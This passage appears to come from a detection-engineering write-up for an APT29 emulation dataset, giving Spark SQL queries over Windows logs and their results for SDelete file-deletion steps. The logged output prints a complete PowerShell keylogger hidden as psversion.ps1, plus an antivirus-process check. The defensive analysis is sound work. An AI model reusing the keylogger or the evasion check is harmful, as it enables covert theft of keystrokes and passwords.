------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Keystroke-Check {
    Get-Process | Where-Object { $_.ProcessName -Eq "avp" -or $_.ProcessName -Eq "acs" -or $_.ProcessName -Eq "outpost" -or $_.ProcessName -Eq "mcvsescn" -or $_.ProcessName -Eq "mcods" -or $_.ProcessName -Eq "navapsvc" -or $_.ProcessName -Eq "kav" -or $_.ProcessName -Eq "AvastSvc" -or $_.ProcessName -Eq "AvastUi" -or $_.ProcessName -Eq "nod32krn" -or $_.ProcessName -Eq "nod32" -or $_.ProcessName -Eq "ekern" -or $_.ProcessName -Eq "dwengine" -or $_.ProcessName -Eq "MsMpEng" -or $_.ProcessName -Eq "msseces" -or $_.ProcessName -Eq "ekrn" -or $_.ProcessName -Eq "savservice" -or $_.ProcessName -Eq "scfservice" -or $_.ProcessName -Eq "savadminservice" }
}

ScriptBlock ID: a2a6be75-3568-4d81-a0ca-40a31de44589
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
-RECORD 3-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
get-process

ScriptBlock ID: 66a7f650-8a84-4dcf-a0f7-41d06de51f5c
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  

4.B.2. File Deletion

Procedure: Deleted rcs.3aka3.doc on disk using SDelete

Criteria: sdelete64.exe deleting the file rcs.3aka3.doc

Detection Type:Telemetry(Correlated)

Query ID:5EED5350-0BFD-4501-8B2D-4CE4F8F9E948

df = spark.sql(
'''
SELECT f.ProcessGuid
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ParentProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 1
    AND LOWER(f.Image) LIKE '%sdelete%'
    AND LOWER(f.CommandLine) LIKE '%3aka3%'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------
 ProcessGuid | {47ab858c-e2ac-5eac-cb03-000000000400} 

Query ID:59A9AC92-124D-4C4B-A6BF-3121C98677C3

df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
    SELECT f.ProcessGuid
    FROM apt29Host f
    INNER JOIN (
      SELECT d.ProcessId, d.ProcessGuid
      FROM apt29Host d
      INNER JOIN (
        SELECT a.ProcessGuid, a.ParentProcessGuid
        FROM apt29Host a
        INNER JOIN (
          SELECT ProcessGuid
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(Image) LIKE "%control.exe"
              AND LOWER(ParentImage) LIKE "%sdclt.exe"
        ) b
        ON a.ParentProcessGuid = b.ProcessGuid
        WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND a.IntegrityLevel = "High"
      ) c
      ON d.ParentProcessGuid= c.ProcessGuid
      WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND d.EventID = 1
        AND d.Image LIKE '%powershell.exe'
    ) e
    ON f.ParentProcessGuid = e.ProcessGuid
    WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND f.EventID = 1
      AND LOWER(f.Image) LIKE '%sdelete%'
      AND LOWER(f.CommandLine) LIKE '%3aka3%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND h.EventID in (12,13)
    AND LOWER(h.TargetObject) RLIKE '.*\\\\\\\\software\\\\\\\\sysinternals\\\\\\\\sdelete.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:02:04.518
ProcessGuid: {47ab858c-e2ac-5eac-cb03-000000000400}
ProcessId: 4140
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete\EulaAccepted
Details: DWORD (0x00000001) 
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:02:04.518
ProcessGuid: {47ab858c-e2ac-5eac-cb03-000000000400}
ProcessId: 4140
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:02:04.518
ProcessGuid: {47ab858c-e2ac-5eac-cb03-000000000400}
ProcessId: 4140
Image: C:\Program Files\SysinternalsSuite\sdelete64.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Sysinternals\SDelete                            

Query ID:3A1DC1C2-B640-4FCE-A71F-2F65AB060A8C

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON f.ProcessId = e.NewProcessId
WHERE LOWER(f.Channel) = "security"
  AND f.EventID = 4688
  AND LOWER(f.NewProcessName) LIKE '%sdelete%'
  AND LOWER(f.CommandLine) LIKE '%3aka3%'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x372E81

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x102c
	New Process Name:	C:\Program Files\SysinternalsSuite\sdelete64.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0xf24
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Program Files\SysinternalsSuite\sdelete64.exe" /accepteula C:\programdata\victim\???cod.3aka3.scr

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.B.3. File Deletion

Procedure: Deleted Draft.zip on disk using SDelete

Criteria: sdelete64.exe deleting the file draft.zip

Detection Type:Telemetry(Correlated)

Query ID:02D0BBFB-4BDF-4167-B530-253779745EF7

df = spark.sql(
'''
SELECT Message, g.CommandLine
FROM apt29Host h
INNER JOIN (
  SELECT f.ProcessGuid, f.CommandLine
  FROM apt29Host f
  INNER JOIN (
    SELECT d.ProcessId, d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
